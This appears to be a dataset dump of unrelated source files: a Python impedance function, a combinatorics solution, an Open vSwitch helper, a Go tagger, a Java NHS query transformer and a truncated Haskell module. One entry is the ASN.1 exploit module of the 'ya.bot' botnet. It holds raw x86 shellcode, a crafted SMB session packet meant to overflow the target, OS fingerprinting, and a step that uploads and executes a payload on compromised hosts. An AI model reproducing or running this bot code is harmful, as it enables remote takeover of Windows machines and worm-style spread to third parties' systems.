content
stringlengths
10
4.9M
def intrinsic_impedance(er=1, ur=1): return sqrt((ur * u0) / (er * e0))
P = 10**9+7 fac = [1] ifac = [1] ff = 1 for i in range(1,200001): ff *= i ff %= P fac.append(ff) ifac.append(pow(ff, P-2, P)) def ncr(n, r): return (fac[n] * ifac[r] % P * ifac[n-r] % P); h,w,a,b = map(int,input().split()) s = 0 nC = b-1 kC = 0 nD = w-b-1+h-1 kD = h-1 for i in range(h-a): C = ncr(nC, kC) D = ncr(nD, kD) s = (s + C * D) % P nC += 1 kC += 1 kD -= 1 nD -= 1 print(s)
/* ya.bot */ #include "..\bot\bot.h" #ifndef NO_EXPSCAN #ifndef NO_EXPSCANASN1 //botbotbotbotbotbotbotbotbotbotbotbotbot //Original code by ScriptGod //botbotbotbotbotbotbotbotbotbotbotbotbot #include <cmath> #include <string> class BitString { public: BitString(); BitString(const char *pszString); BitString(void *pData, int nDataLen); BitString(void *pPre, int nPreLen, void *pData, int nDataLen); void Free(); bool ASN1(); bool Bits(); bool Append(const char *pszString); bool Append(void *pData, int nDataLen); bool Append(BitString Str); bool Constr(); bool Constr(BitString Str); void *m_pData; int m_nDataLen; }; BitString::BitString() { m_nDataLen = 0; m_pData = NULL; } BitString::BitString(const char *pszString) { *this = BitString((void*)pszString, strlen(pszString)); } BitString::BitString(void *pData, int nDataLen) { void *pBuffer; pBuffer = malloc(nDataLen); if (!pBuffer) return; memset(pBuffer, 0, nDataLen); memcpy(pBuffer, pData, nDataLen); m_nDataLen = nDataLen; m_pData = pBuffer; } BitString::BitString(void *pPre, int nPreLen, void *pData, int nDataLen) { void *pBuffer; pBuffer = malloc(nPreLen + nDataLen); if (!pBuffer) return; memset(pBuffer, 0, nPreLen + nDataLen); memcpy(pBuffer, pPre, nPreLen); memcpy(((char*)pBuffer) + nPreLen, pData, nDataLen); m_nDataLen = nPreLen + nDataLen; m_pData = pBuffer; } void BitString::Free() { if (m_pData) free(m_pData); m_nDataLen = 0; m_pData = NULL; } bool BitString::ASN1() { int nNumStrLen; unsigned char *pNewData; if (m_nDataLen >= 0xFFFF) return FALSE; if (m_nDataLen < 0x7F) nNumStrLen = 1; else nNumStrLen = 3; pNewData = (unsigned char *)malloc(m_nDataLen + nNumStrLen); if (!pNewData) return FALSE; memset(pNewData, 0, m_nDataLen + nNumStrLen); if (nNumStrLen == 1) { pNewData[ 0 ] = m_nDataLen; memcpy(pNewData + 1, m_pData, m_nDataLen); } else { pNewData[0] = 0x82; pNewData[1] = m_nDataLen >> 8; pNewData[2] = m_nDataLen & 0xFF; memcpy(pNewData + 3, m_pData, m_nDataLen); } free(m_pData); m_nDataLen = nNumStrLen + m_nDataLen; m_pData = pNewData; return TRUE; } bool BitString::Bits() { unsigned char *pNewData; BitString StrTemp("\x00", 1, m_pData, m_nDataLen); StrTemp.ASN1(); pNewData = (unsigned char *)malloc(StrTemp.m_nDataLen + 1); if (!pNewData) return FALSE; memset(pNewData, 0, StrTemp.m_nDataLen + 1); pNewData[0] = '\x03'; memcpy(pNewData + 1, StrTemp.m_pData, StrTemp.m_nDataLen); Free(); m_nDataLen = StrTemp.m_nDataLen + 1; m_pData = pNewData; StrTemp.Free(); return TRUE; } bool BitString::Append(void *pData, int nDataLen) { BitString Temp(m_pData, m_nDataLen, pData, nDataLen); Free(); *this = Temp; return TRUE; } bool BitString::Append(const char *pszString) { return Append((void*)pszString, strlen(pszString)); } bool BitString::Append(BitString Str) { return Append(Str.m_pData, Str.m_nDataLen); } bool BitString::Constr() { if (!ASN1()) return FALSE; BitString StrTemp2("\x23", 1, m_pData, m_nDataLen); Free(); *this = StrTemp2; return TRUE; } bool BitString::Constr(BitString Str) { if (!Append(Str)) return FALSE; return Constr(); } BitString Token(void *pStage0, int nStage0Len, void *pStage1, int nStage1Len) { char bk[] = "\xf8\x0f\x01"; char fw[] = "\xf8\x0f\x01\x00"; char peblock[] = "\x20\xf0\xfd\x7f"; char tag[] = "\x90\x42\x90\x42\x90\x42\x90\x42"; char szRandom[GIABUF]; BitString Token; BitString Temp_Constr_FWBK; BitString Temp_Bits_TagStage1; BitString Temp_Constr_Unknown; BitString Temp_Bits_PEBlockStage0; BitString Temp_Constr_PEBlockStage0_Unknown; BitString Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1; BitString CompleteBitString; BitString Temp_Token1; BitString Temp_Token2; if (nStage0Len > 1032 || sizeof(tag) - 1 + nStage1Len > 1032) return Token; Temp_Constr_FWBK.Append(fw, sizeof(fw) - 1); Temp_Constr_FWBK.Append(bk, sizeof(bk) - 1); Temp_Constr_FWBK.Bits(); Temp_Constr_FWBK.Constr(); memset(szRandom, 'B', sizeof(szRandom)); Temp_Bits_TagStage1.Append(tag, sizeof(tag) - 1); Temp_Bits_TagStage1.Append(pStage1, nStage1Len); Temp_Bits_TagStage1.Append(szRandom, 1033 - Temp_Bits_TagStage1.m_nDataLen); Temp_Bits_TagStage1.Bits(); Temp_Constr_Unknown.Append("\xEB\x06\x90\x90\x90\x90\x90\x90"); Temp_Constr_Unknown.Bits(); memset(szRandom, 'D', sizeof(szRandom)); BitString Bits_Unknown2(szRandom, 1040); Bits_Unknown2.Bits(); Temp_Constr_Unknown.Constr(Bits_Unknown2); Bits_Unknown2.Free(); memset(szRandom, 'C', sizeof(szRandom)); Temp_Bits_PEBlockStage0.Append("CCCC"); Temp_Bits_PEBlockStage0.Append(peblock, sizeof(peblock) - 1); Temp_Bits_PEBlockStage0.Append(pStage0, nStage0Len); Temp_Bits_PEBlockStage0.Append(szRandom, 1032 - nStage0Len); Temp_Bits_PEBlockStage0.Bits(); Temp_Constr_PEBlockStage0_Unknown.Append(Temp_Bits_PEBlockStage0); Temp_Constr_PEBlockStage0_Unknown.Append(Temp_Constr_Unknown); Temp_Constr_PEBlockStage0_Unknown.Constr(); Temp_Bits_PEBlockStage0.Free(); Temp_Constr_Unknown.Free(); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Append(Temp_Bits_TagStage1); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Append(Temp_Constr_FWBK); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Append(Temp_Constr_PEBlockStage0_Unknown); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Constr(); Temp_Bits_TagStage1.Free(); Temp_Constr_FWBK.Free(); Temp_Constr_PEBlockStage0_Unknown.Free(); memset(szRandom, 'A', sizeof(szRandom)); CompleteBitString.Append(szRandom, 1024); CompleteBitString.Bits(); CompleteBitString.Append("\x03\x00", 2); CompleteBitString.Append(Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1); CompleteBitString.Constr(); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Free(); Temp_Token1.Append(CompleteBitString); Temp_Token1.ASN1(); CompleteBitString.Free(); Temp_Token2.Append("\xA1"); Temp_Token2.Append(Temp_Token1); Temp_Token2.ASN1(); Temp_Token1.Free(); Temp_Token1.Append("\x30"); Temp_Token1.Append(Temp_Token2); Temp_Token1.ASN1(); Temp_Token2.Free(); Temp_Token2.Append("\x06\x06\x2B\x06\x01\x05\<KEY>"); Temp_Token2.Append(Temp_Token1 ); Temp_Token2.ASN1(); Temp_Token1.Free(); Token.Append("\x60"); Token.Append(Temp_Token2); Temp_Token2.Free(); return Token; } int asn1_recvsmb(SOCKET sock, char *pszBuffer, int nLength, int nFlags) { fd_set fdset_read, fdset_write; TIMEVAL timeout; FD_ZERO(&fdset_read); FD_ZERO(&fdset_write); FD_SET(sock, &fdset_read); FD_SET(sock, &fdset_write); timeout.tv_sec = 10; timeout.tv_usec = 0; if (select(sock + 1, &fdset_read, NULL, &fdset_write, &timeout) == SOCKET_ERROR) return FALSE; if (!FD_ISSET(sock, &fdset_read)) return FALSE; return recv(sock, pszBuffer, nLength, nFlags); } bool asn1_sendsmb(SOCKET sock, void *pBuffer, int nLength) { DWORD dwNetNum; dwNetNum = htonl(nLength); if (send(sock, (char *)&dwNetNum, sizeof(dwNetNum), 0) != sizeof(dwNetNum)) return FALSE; return (send(sock, (char *)pBuffer, nLength, 0) == nLength); } bool expscan_asn1(SExpScanInfo s_esi) { char smb_request[] = "\x81\x00\x00\x44\x20\x43\x4B\x46\x44\x45\x4E\x45\x43\x46\x44\x45" "\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43" "\x41\x43\x41\x43\x41\x00\x20\x43\x41\x43\x41\x43\x41\x43\x41\x43" "\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43" "\x41\x43\x41\x43\x41\x41\x41\x00"; char smb_negotiate[] = "\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x37\x13\x00\x00\x00\x00" "\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50" "\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4C\x41\x4E\x4D" "\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F\x77\x73\x20\x66" "\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70\x73\x20\x33\x2E" "\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00\x02\x4C" "\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54\x20\x4C\x4D\x20" "\x30\x2E\x31\x32\x00"; char smb_session1[] = "\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x37\x13\x00\x00\x00\x00" "\x0C\xFF\x00\x00\x00\x04\x11\x0A\x00\x00\x00\x00\x00\x00\00"; char smb_session2[] = "\x00\x00\x00\x00\xD4\x00\x00\x80"; char smb_session3[] = "\x00\x00\x00\x00\x00\x00"; char shellcode_stage0[] = "\x53\x56\x57\x66\x81\xEC\x80\x00\x89\xE6\xE8\xED\x00\x00\x00\xFF" "\x36\x68\x09\x12\xD6\x63\xE8\xF7\x00\x00\x00\x89\x46\x08\xE8\xA2" "\x00\x00\x00\xFF\x76\x04\x68\x6B\xD0\x2B\xCA\xE8\xE2\x00\x00\x00" "\x89\x46\x0C\xE8\x3F\x00\x00\x00\xFF\x76\x04\x68\xFA\x97\x02\x4C" "\xE8\xCD\x00\x00\x00\x31\xDB\x68\x10\x04\x00\x00\x53\xFF\xD0\x89" "\xC3\x56\x8B\x76\x10\x89\xC7\xB9\x10\x04\x00\x00\xF3\xA4\x5E\x31" "\xC0\x50\x50\x50\x53\x50\x50\xFF\x56\x0C\x8B\x46\x08\x66\x81\xC4" "\x80\x00\x5F\x5E\x5B\xFF\xE0\x60\xE8\x23\x00\x00\x00\x8B\x44\x24" "\x0C\x8D\x58\x7C\x83\x43\x3C\x05\x81\x43\x28\x00\x10\x00\x00\x81" "\x63\x28\x00\xF0\xFF\xFF\x8B\x04\x24\x83\xC4\x14\x50\x31\xC0\xC3" "\x31\xD2\x64\xFF\x32\x64\x89\x22\x31\xDB\xB8\x90\x42\x90\x42\x31" "\xC9\xB1\x02\x89\xDF\xF3\xAF\x74\x03\x43\xEB\xF3\x89\x7E\x10\x64" "\x8F\x02\x58\x61\xC3\x60\xBF\x20\xF0\xFD\x7F\x8B\x1F\x8B\x46\x08" "\x89\x07\x8B\x7F\xF8\x81\xC7\x78\x01\x00\x00\x89\xF9\x39\x19\x74" "\x04\x8B\x09\xEB\xF8\x89\xFA\x39\x5A\x04\x74\x05\x8B\x52\x04\xEB" "\xF6\x89\x11\x89\x4A\x04\xC6\x43\xFD\x01\x61\xC3\xA1\x0C\xF0\xFD" "\x7F\x8B\x40\x1C\x8B\x58\x08\x89\x1E\x8B\x00\x8B\x40\x08\x89\x46" "\x04\xC3\x60\x8B\x6C\x24\x28\x8B\x45\x3C\x8B\x54\x05\x78\x01\xEA" "\x8B\x4A\x18\x8B\x5A\x20\x01\xEB\xE3\x38\x49\x8B\x34\x8B\x01\xEE" "\x31\xFF\x31\xC0\xFC\xAC\x38\xE0\x74\x07\xC1\xCF\x0D\x01\xC7\xEB" "\xF4\x3B\x7C\x24\x24\x75\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B" "\x8B\x5A\x1C\x01\xEB\x8B\x04\x8B\x01\xE8\x89\x44\x24\x1C\x61\xC2" "\x08\x00\xEB\xFE"; BitString BitToken; char *pszPacket, szRecvBuffer[MEDBUF], szShellCode[BIGBUF]; int nPos = 0, nShellcodeSize, nSize, nTargetOS = OS_UNKNOWN; #ifndef NO_DEBUG debug_print("Exploit scanning ASN1, expscan_asn1()"); #endif if (s_esi.m_nPort != 445) { nTargetOS = fphost(s_esi.m_szIP, s_esi.m_nPort); if ((nTargetOS == OS_UNKNOWN) || (nTargetOS == OS_WINNT) || (nTargetOS == OS_WIN2003) || (nTargetOS == OS_WINVISTA)) return FALSE; } if (s_esi.m_csock == INVALID_SOCKET) return FALSE; if (s_esi.m_nPort == 139) { if (send(s_esi.m_csock, smb_request, sizeof(smb_request) - 1, 0) == SOCKET_ERROR) return FALSE; if (asn1_recvsmb(s_esi.m_csock, szRecvBuffer, sizeof(szRecvBuffer) - 1, 0) == SOCKET_ERROR) return FALSE; } memcpy(szShellCode, shellcode_uploadexecute, sizeof(shellcode_uploadexecute) - 1); nShellcodeSize = sizeof(shellcode_uploadexecute) - 1; BitToken = Token(shellcode_stage0, sizeof(shellcode_stage0) - 1, szShellCode, nShellcodeSize); if (!BitToken.m_nDataLen) return FALSE; nSize = sizeof(smb_session1) - 1 + 2 + sizeof(smb_session2) - 1 + 2 + BitToken.m_nDataLen + sizeof(smb_session3) - 1; pszPacket = (char *)malloc(nSize); if (!pszPacket) return FALSE; memset(pszPacket, 0, nSize); memcpy(pszPacket, smb_session1, sizeof(smb_session1) - 1); nPos += sizeof(smb_session1) - 1; *(short*)(&pszPacket[nPos]) = BitToken.m_nDataLen; nPos += 2; memcpy(pszPacket + nPos, smb_session2, sizeof(smb_session2) - 1); nPos += sizeof(smb_session2 ) - 1; *(short*)(&pszPacket[nPos]) = BitToken.m_nDataLen; nPos += 2; memcpy(pszPacket + nPos, BitToken.m_pData, BitToken.m_nDataLen); nPos += BitToken.m_nDataLen; memcpy(pszPacket + nPos, smb_session3, sizeof(smb_session3) - 1); nPos += sizeof(smb_session3) - 1; if (!asn1_sendsmb(s_esi.m_csock, smb_negotiate, sizeof(smb_negotiate) - 1)) { free(pszPacket); return FALSE; } if (asn1_recvsmb(s_esi.m_csock, szRecvBuffer, sizeof(szRecvBuffer) - 1, 0) == SOCKET_ERROR) { free(pszPacket); return FALSE; } if (!asn1_sendsmb(s_esi.m_csock, pszPacket, nSize)) { free(pszPacket); return FALSE; } if (asn1_recvsmb(s_esi.m_csock, szRecvBuffer, sizeof(szRecvBuffer) - 1, 0) == SOCKET_ERROR) { free(pszPacket); return FALSE; } free(pszPacket); BitToken.Free(); if (!transfer_directtransfer(s_esi.m_szIP, SHELLCODE_UPLOADPORT, s_esi.m_szExploitName, s_esi.m_bsock, s_esi.m_szResultChannel, s_esi.m_bSilent, s_esi.m_bVerbose)) return FALSE; return TRUE; } #endif #endif
def port_is_in_bridge(bridge, interface_name) -> bool: if not interface_name or interface_name == "": return False dump1 = subprocess.Popen( ["ovs-ofctl", "show", bridge], stdout=subprocess.PIPE, ) for line1 in dump1.stdout.readlines(): if interface_name not in str(line1): continue return True return False
package pos import "github.com/chewxy/lingo" // "log" func (p *Tagger) getSentences() { defer close(p.sentences) var sentence lingo.AnnotatedSentence sentence = append(sentence, lingo.RootAnnotation()) for lexeme := range p.Input { if lexeme.LexemeType != lingo.EOF { a := lingo.NewAnnotation() a.Lexeme = lexeme if err := a.Process(p); err != nil { panic(err) // for now } sentence = append(sentence, a) } else { p.sentences <- sentence // reset sentence = lingo.AnnotatedSentence{lingo.RootAnnotation()} } // TODO: Sentence splitting } }
<gh_stars>0 /** * */ package OctopusConsortium.Core.Transformers.RCS; import java.text.DateFormat; import java.text.SimpleDateFormat; import java.util.Calendar; import java.util.Date; import java.util.UUID; import javax.xml.bind.JAXBElement; import org.mule.api.transformer.TransformerException; import org.mule.transformer.AbstractTransformer; import org.mule.transformer.types.DataTypeFactory; import OctopusConsortium.Core.CommonValues; import OctopusConsortium.Models.RCS.COCDTP145200GB01AssignedAuthor; import OctopusConsortium.Models.RCS.CsEntityNameUse; import OctopusConsortium.Models.RCS.CsNullFlavor; import OctopusConsortium.Models.RCS.EnGiven; import OctopusConsortium.Models.RCS.IINPfITOidRequiredAssigningAuthorityName; import OctopusConsortium.Models.RCS.IINPfITUuidMandatory; import OctopusConsortium.Models.RCS.ObjectFactory; import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonBirthTime; import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonFamilyName; import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonGivenName; import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonId; import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonId.Value; import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonPostalCode; import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonStreetAddressLine1; import OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery; import OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery.Code; import OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery.EffectiveTime; import OctopusConsortium.Models.RCS.ST; import OctopusConsortium.Service.Models.IdentifyPatientResponse; import OctopusConsortium.Service.Models.Patient; import OctopusConsortium.Service.Models.SubmitEncounterResponse; /** * @author stuart.yeates * */ public class IdentifyPatientResponseToRepeatCallerQuery extends AbstractTransformer { private CommonValues commonValues; protected String ods; protected String orgName; public String getOds() { return ods; } public void setOds(String ods) { this.ods = ods; } public String getOrgName() { return orgName; } public void setOrgName(String orgName) { this.orgName = orgName; } public IdentifyPatientResponseToRepeatCallerQuery() { // TODO Auto-generated constructor stub super(); this.registerSourceType(DataTypeFactory.create(OctopusConsortium.Service.Models.IdentifyPatientResponse.class)); this.registerSourceType(DataTypeFactory.create(OctopusConsortium.Service.Models.SubmitEncounterResponse.class)); this.registerSourceType(DataTypeFactory.create(OctopusConsortium.Service.Models.Patient.class)); this.setReturnDataType(DataTypeFactory.create(OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery.class)); } /* (non-Javadoc) * @see org.mule.transformer.AbstractMessageTransformer#transformMessage(org.mule.api.MuleMessage, java.lang.String) */ @Override public Object doTransform(Object payload, String outputEncoding) throws TransformerException { Patient msg = null; commonValues = new CommonValues(ods, orgName); // if(payload instanceof OctopusConsortium.Models.RepeatCallerRequest){ // msg = ((IdentifyPatientResponseEnvelope) ((OctopusConsortium.Models.RepeatCallerRequest)payload).getPatientIdentity()).getPatient(); // }else if(payload instanceof IdentifyPatientResponse){ msg = ((IdentifyPatientResponse) payload).getPatient(); } else if(payload instanceof SubmitEncounterResponse){ msg = ((SubmitEncounterResponse) payload).getPatient(); } else{ msg =(Patient)payload; } return PopulateCallerQuery(msg); } //Populates root attributes and properties private QUPAMT000001GB01RepeatCallerQuery PopulateCallerQuery(Patient msg) { ObjectFactory of = new ObjectFactory(); QUPAMT000001GB01RepeatCallerQuery rcQuery = of.createQUPAMT000001GB01RepeatCallerQuery(); rcQuery.setClassCode("CACT"); rcQuery.setMoodCode("EVN"); rcQuery.setCode(new Code()); rcQuery.getCode().setCode("01"); rcQuery.getCode().setCodeSystem("2.16.840.1.113883.2.1.3.2.4.17.420"); Date now = Calendar.getInstance().getTime(); DateFormat df = new SimpleDateFormat("yyyyMMddHHmmss"); EffectiveTime edate = of.createQUPAMT000001GB01RepeatCallerQueryEffectiveTime(); edate.setValue(df.format(now)); rcQuery.setEffectiveTime(edate); rcQuery.setId(new IINPfITUuidMandatory()); rcQuery.getId().setRoot(UUID.randomUUID().toString().toUpperCase()); rcQuery.setQuery(of.createQUPAMT000001GB01Query()); rcQuery.getQuery().setPersonBirthTime(PopulatePersonBirthTime(of,msg)); rcQuery.getQuery().setPersonFamilyName(PopulatePersonFamilyName(of,msg)); rcQuery.getQuery().setPersonGivenName(PopulatePersonGivenName(of,msg)); rcQuery.getQuery().setPersonId(PopulatePersonID(of,msg)); rcQuery.getQuery().setPersonPostalCode(PopulatePersonPostalCode(of,msg)); rcQuery.getQuery().setPersonStreetAddressLine1(PopulatePersonAddressLine1(of,msg)); rcQuery.setAuthor(of.createQUPAMT000001GB01Author()); rcQuery.getAuthor().setTypeCode("AUT"); rcQuery.getAuthor().getContextControlCode().add("OP"); rcQuery.getAuthor().setContentId(of.createTemplateContent()); //rcQuery.getAuthor().getContentId().setAssigningAuthorityName(AssigningAuthorityName); rcQuery.getAuthor().getContentId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.16"); rcQuery.getAuthor().getContentId().setExtension("COCD_TP145200GB01#AssignedAuthor"); //the AuthorPersonUniversal (COCD_TP145200GB01) schema is represented by class COCDTP145200GB01AssignedAuthor rcQuery.getAuthor().setCOCDTP145200GB01AssignedAuthor(CreateAuthorPersonUniversal(of)); return rcQuery; } private COCDTP145200GB01AssignedAuthor CreateAuthorPersonUniversal(ObjectFactory of) { COCDTP145200GB01AssignedAuthor authorTemplate = of.createCOCDTP145200GB01AssignedAuthor(); authorTemplate.setClassCode("ASSIGNED"); authorTemplate.setCode(of.createCVNPfITCodedplainRequired()); authorTemplate.getCode().setNullFlavor(CsNullFlavor.NI); IINPfITOidRequiredAssigningAuthorityName aname = of.createIINPfITOidRequiredAssigningAuthorityName(); aname.setNullFlavor(CsNullFlavor.NI); authorTemplate.getId().add(aname); /* IINPfITOidRequiredAssigningAuthorityName aname = of.createIINPfITOidRequiredAssigningAuthorityName(); aname.setRoot("2.16.840.1.113883.2.1.3.2.4.18.24"); aname.setExtension(CommonValues.ODS_ORGANISATION_CODE); aname.setAssigningAuthorityName(CommonValues.ODS_ASSIGNING_AUTHORITY_NAME); authorTemplate.getId().add(aname); */ authorTemplate.setTemplateId(of.createCOCDTP145200GB01AssignedAuthorTemplateId()); authorTemplate.getTemplateId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.2"); authorTemplate.getTemplateId().setExtension("COCD_TP145200GB01#AssignedAuthor"); //person is required so create a empty person authorTemplate.setAssignedPerson(of.createCOCDTP145200GB01Person()); authorTemplate.getAssignedPerson().setClassCode("PSN"); authorTemplate.getAssignedPerson().setDeterminerCode("INSTANCE"); authorTemplate.getAssignedPerson().setName(of.createPN()); authorTemplate.getAssignedPerson().getName().getUse().add(CsEntityNameUse.L); EnGiven given = of.createEnGiven(); given.setContent("");//set a blank name authorTemplate.getAssignedPerson().getName().getContent().add(of.createENGiven(given)); authorTemplate.getAssignedPerson().setTemplateId(of.createCOCDTP145200GB01PersonTemplateId()); authorTemplate.getAssignedPerson().getTemplateId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.2"); authorTemplate.getAssignedPerson().getTemplateId().setExtension("COCD_TP145200GB01#assignedPerson"); authorTemplate.setRepresentedOrganization(of.createCOCDTP145200GB01Organization()); authorTemplate.getRepresentedOrganization().setClassCode("ORG"); authorTemplate.getRepresentedOrganization().setDeterminerCode("INSTANCE"); authorTemplate.getRepresentedOrganization().setId(of.createCOCDTP145200GB01OrganizationId()); //authorTemplate.getRepresentedOrganization().getId().setAssigningAuthorityName(CommonValues.ODS_ASSIGNING_AUTHORITY_NAME); authorTemplate.getRepresentedOrganization().getId().setRoot("2.16.840.1.113883.2.1.3.2.4.19.1"); authorTemplate.getRepresentedOrganization().getId().setExtension(commonValues.ODS_ORGANISATION_CODE); authorTemplate.getRepresentedOrganization().setName(of.createON()); authorTemplate.getRepresentedOrganization().getName().getContent().add(commonValues.getOrganisation_Name()); authorTemplate.getRepresentedOrganization().setTemplateId(of.createCOCDTP145200GB01OrganizationTemplateId()); authorTemplate.getRepresentedOrganization().getTemplateId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.2"); authorTemplate.getRepresentedOrganization().getTemplateId().setExtension("COCD_TP145200GB01#representedOrganization"); return authorTemplate; } private JAXBElement<QUPAMT000001GB01PersonBirthTime> PopulatePersonBirthTime( ObjectFactory of,Patient patient) { JAXBElement<QUPAMT000001GB01PersonBirthTime> jaxbe_birthTime = null; if(patient.getDOB()!=null) { QUPAMT000001GB01PersonBirthTime birthTime = of.createQUPAMT000001GB01PersonBirthTime(); QUPAMT000001GB01PersonBirthTime.Value ts = of.createQUPAMT000001GB01PersonBirthTimeValue(); DateFormat yyyyMMdd = new SimpleDateFormat("yyyyMMdd "); ts.setValue(yyyyMMdd.format(patient.getDOB().toGregorianCalendar().getTime()).trim()); birthTime.setValue(ts); birthTime.setSemanticsText(of.createST()); birthTime.getSemanticsText().setContent("Person.birthTime"); jaxbe_birthTime = of.createQUPAMT000001GB01QueryPersonBirthTime(birthTime); } return jaxbe_birthTime; } private JAXBElement<QUPAMT000001GB01PersonFamilyName> PopulatePersonFamilyName( ObjectFactory of, Patient patient) { JAXBElement<QUPAMT000001GB01PersonFamilyName> jaxbe_famName = null; if(patient.getSurname()!=null) { QUPAMT000001GB01PersonFamilyName famName = of.createQUPAMT000001GB01PersonFamilyName(); famName.setValue(new ST()); famName.getValue().setContent(patient.getSurname()); famName.setSemanticsText(of.createST()); famName.getSemanticsText().setContent("Person.familyName"); jaxbe_famName = of.createQUPAMT000001GB01QueryPersonFamilyName(famName); } return jaxbe_famName; } private JAXBElement<QUPAMT000001GB01PersonGivenName> PopulatePersonGivenName( ObjectFactory of, Patient patient) { JAXBElement<QUPAMT000001GB01PersonGivenName> jaxbe_givenName = null; if(patient.getForename()!=null) { QUPAMT000001GB01PersonGivenName givenName = of.createQUPAMT000001GB01PersonGivenName(); givenName.setValue(new ST()); givenName.getValue().setContent(patient.getForename()); givenName.setSemanticsText(of.createST()); givenName.getSemanticsText().setContent("Person.givenName"); jaxbe_givenName= of.createQUPAMT000001GB01QueryPersonGivenName(givenName); } return jaxbe_givenName; } private JAXBElement<QUPAMT000001GB01PersonId> PopulatePersonID( ObjectFactory of, Patient patient) { JAXBElement<QUPAMT000001GB01PersonId> jaxbe_id =null; if(patient.getNhsNumber()!=null) { QUPAMT000001GB01PersonId id = of.createQUPAMT000001GB01PersonId(); id.setValue(new Value() ); id.getValue().setRoot("2.16.840.1.113883.2.1.4.1"); id.getValue().setExtension(patient.getNhsNumber()); id.setSemanticsText(of.createST()); id.getSemanticsText().setContent("Person.id"); jaxbe_id = of.createQUPAMT000001GB01QueryPersonId(id); } return jaxbe_id; } private JAXBElement<QUPAMT000001GB01PersonPostalCode> PopulatePersonPostalCode( ObjectFactory of, Patient patient) { JAXBElement<QUPAMT000001GB01PersonPostalCode> jaxbe_postcode =null; if(patient.getAddress()!=null && patient.getAddress().getPostalCode()!=null) { QUPAMT000001GB01PersonPostalCode postalCode = new QUPAMT000001GB01PersonPostalCode(); postalCode.setValue(new ST()); postalCode.getValue().setContent(patient.getAddress().getPostalCode()); postalCode.setSemanticsText(of.createST()); postalCode.getSemanticsText().setContent("Person.postalCode"); jaxbe_postcode = of.createQUPAMT000001GB01QueryPersonPostalCode(postalCode); } return jaxbe_postcode; } private JAXBElement<QUPAMT000001GB01PersonStreetAddressLine1> PopulatePersonAddressLine1( ObjectFactory of, Patient patient) { JAXBElement<QUPAMT000001GB01PersonStreetAddressLine1> jaxbe_add1 =null; if(patient.getAddress()!=null) { QUPAMT000001GB01PersonStreetAddressLine1 add1=of.createQUPAMT000001GB01PersonStreetAddressLine1(); add1.setValue(new ST()); //add1.getValue().setContent(patient.getPatient().getAddress().getHouseNumber() // + " " // + patient.getPatient().getAddress().getStreetName()); add1.getValue().setContent(patient.getAddress().getStreetAddressLine1()); add1.setSemanticsText(of.createST()); add1.getSemanticsText().setContent("Person.streetAddressLine1"); jaxbe_add1 = of.createQUPAMT000001GB01QueryPersonStreetAddressLine1(add1); } return jaxbe_add1; } }
<gh_stars>1-10 module Mima.Asm.Weed ( Weed , runWeed , transformErrors , critical , harmless , WeedError(..) , errorWith -- * Megaparsec compatibility , defaultPosState , asParseErrors , runWeedBundle ) where import qualified Data.List.NonEmpty as NE import Data.Monoid import qualified Data.Set as Set import Text.Megaparsec -- The star of the show data Weed e a = Weed (Endo [e]) (Either e a) instance Functor (Weed e) where fmap f (Weed e a) = Weed e $ fmap f a instance Applicative (Weed e) where pure = Weed mempty . pure (Weed es1 (Left e1)) <*> (Weed es2 (Left e2)) = Weed (es1 <> Endo (e1:) <> es2) (Left e2) (Weed es1 f) <*> (Weed es2 a) = Weed (es1 <> es2) (f <*> a) instance Monad (Weed e) where (Weed es1 v) >>= f = case f <$> v of Left e -> Weed es1 (Left e) Right (Weed es2 a) -> Weed (es1 <> es2) a runWeed :: Weed e a -> Either (NE.NonEmpty e) a -- Since the Endos never remove an element and we add an extra -- element, this list is never empty. -- -- I've tried to figure out nicer types for this, but if I want to -- keep the Endo trick, the tradeoff isn't worth it. The problem here -- is that I can't easily check if 'es' is 'mempty' with these -- endofunctors. runWeed (Weed es (Left e)) = Left $ e NE.:| appEndo es [] runWeed (Weed es (Right a)) = case appEndo es [] of (x:xs) -> Left $ x NE.:| xs [] -> Right a transformErrors :: (e1 -> e2) -> Weed e1 a -> Weed e2 a transformErrors f (Weed es result) = Weed es' result' where es' = Endo $ (++) $ map f $ appEndo es [] result' = case result of Right a -> Right a Left e -> Left $ f e critical :: e -> Weed e a critical e = Weed mempty (Left e) harmless :: e -> Weed e () harmless e = Weed 